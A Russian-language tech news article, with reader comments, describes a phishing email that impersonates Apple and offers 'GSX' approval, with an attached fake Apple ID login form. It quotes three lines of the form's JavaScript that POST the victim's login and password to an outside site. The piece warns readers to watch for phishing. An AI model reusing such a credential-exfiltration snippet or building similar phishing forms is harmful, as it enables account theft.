Внимание! Сегодня нам на почту пришло странное письмо… от Apple

|
FavoriteLoading В закладки
Внимание! Сегодня нам на почту пришло странное письмо… от Apple

На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.

Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.

Само письмо выглядит следующим образом:

FishingApple_2

Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.

Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.

GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.

Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.

FishingApple_3

Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:

FishingApple_1_760x388

Разумеется, вводить Apple ID в подозрительное окно мы не стали.


В прикрепленном файле был обнаружен следующий код:

[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]

Он передает логин и пароль на сайт nubetelstore.com

nubelstore

В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.

fishing_whois

Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.


Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.

Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.

Рейтинг поста:

1 Звезд2 Звезды3 Звезды4 Звезды5 Звезд (5.00 из 5, оценили: 1)
🤓 Хочешь больше? Подпишись на наш Telegram.
... и не забывай читать наш Facebook и Twitter 🍒
FavoriteLoading В закладки
undefined
iPhones.ru
Будь бдительнее. Выглядит весьма правдоподобно.
Прокомментировать

🙈 Комментарии 20

  1. Supriarch avatar
    Supriarch2 августа 2016
    2

    а как они смогли такую почту сделать и с нее рассылать?

    MikeCom avatar
    MikeCom2 августа 2016
    0

    @Supriarch, я бы добавил “…без участия или недосмотра Apple(что, в данном случае, почти одно и то же…”

    rescr1pt avatar
    rescr1pt2 августа 2016
    4

    @Supriarch, Поле ОТ, можно отослать любое.

    DiEV avatar
    DiEV2 августа 2016
    0

    @rescr1pt, в догонку… Открывать прилинкованные файлы, надо быть Откровенным Алёшей Поповичем!

    ILYA2606 avatar
    ILYA26062 августа 2016
    2

    @DiEV, видимо когда открывали, держали на готове пистолет, направленный в монитор :)

    Paradoxx avatar
    Paradoxx2 августа 2016
    1

    @Supriarch, Вы можете придумать любой почтовый адрес, и ввести любой сайт в качестве почтового сервера исходящих сообщений и делать рассылку. Просто получить в ответ ничего не сможете, так как по факту такого адреса на таком сервере существовать не будет.

    Miku Hatsune2 августа 2016
    1

    @Paradoxx, в гмейле при таких письмах с непроверенного сервера вроде в пол экрана предупреждение

  2. Дмитрий Скворцов avatar
    Дмитрий Скворцов2 августа 2016
    1

    Чувствую я что это тем не менее оригинальное письмо, пришедшее либо по ошибке, либо кому-то из вашей команды…

  3. dadashov avatar
    dadashov2 августа 2016
    3

    исходники файла показали бы, а то интересно :)

  4. DenSen avatar
    DenSen2 августа 2016
    5

    Письма с ошибками, отправленные якобы от лица крупных и уважаемых корпораций, должны отправляться в корзину без кропотливого анализа.
    Я бы отправил это письмо в корзину сразу же после встреченного “For activate”.
    И меня окончательно бы добило “Sincerely, Apple”. Не Apple Support, не Apple Inc., а просто Apple. Какая прелесть!

    igrushkin avatar
    igrushkin2 августа 2016
    0

    @DenSen, казалось бы, причём тут Think Different :-))

  5. ComradeSerj2 августа 2016
    4

    “For access to”
    “For activate”
    Ясно.

    Дмитрий Бардаш avatar
    Дмитрий Бардаш2 августа 2016
    0

    @ComradeSerj, :) но с почтой сработали хорошо:)

    igrushkin avatar
    igrushkin2 августа 2016
    0

    @ComradeSerj, русскоязычные ушки торчат

  6. w_maybach avatar
    w_maybach2 августа 2016
    0

    “For activate” спалило всю эту китайскую аферу с потрохами.
    Лучше бы рассказали, как злоумышленники получают адреса во вполне легитимных доменных зонах (как @apple.com, например).

    tar.gz avatar
    tar.gz2 августа 2016
    0

    @w_maybach, они не получали такой адрес и не отсылали с него любой софт рассольник умеет писать что угодно

  7. Serj Samsonov2 августа 2016
    0

    Первое правило везде и во всем – не верю сраному куску байтов. Глупому человеку можно написать крупными буквами “НЕ ВХОДИТ – ЭТО УБЬЕТ ТЕБЯ” и он все равно зайдет. Проверено 100%

  8. KimID avatar
    KimID2 августа 2016
    0

    Если письмо от Apple пришло не с 17.0.0.0/8, то автоматически в спам.

  9. Tempest avatar
    Tempest3 августа 2016
    0

    вторая статья про разводы рассчитанные на школьников и глупцов

  10. AlexSoCute avatar
    AlexSoCute3 августа 2016
    1

    Есть такая штука как DKIM. Так вот это письмо попадет в спам любого сервиса, т.к нет DKIM подписи

Вы должны авторизоваться или зарегистрироваться для комментирования.

Нашли орфографическую ошибку в новости?

Выделите ее мышью и нажмите Ctrl+Enter.

Как установить аватар в комментариях?

Ответ вот здесь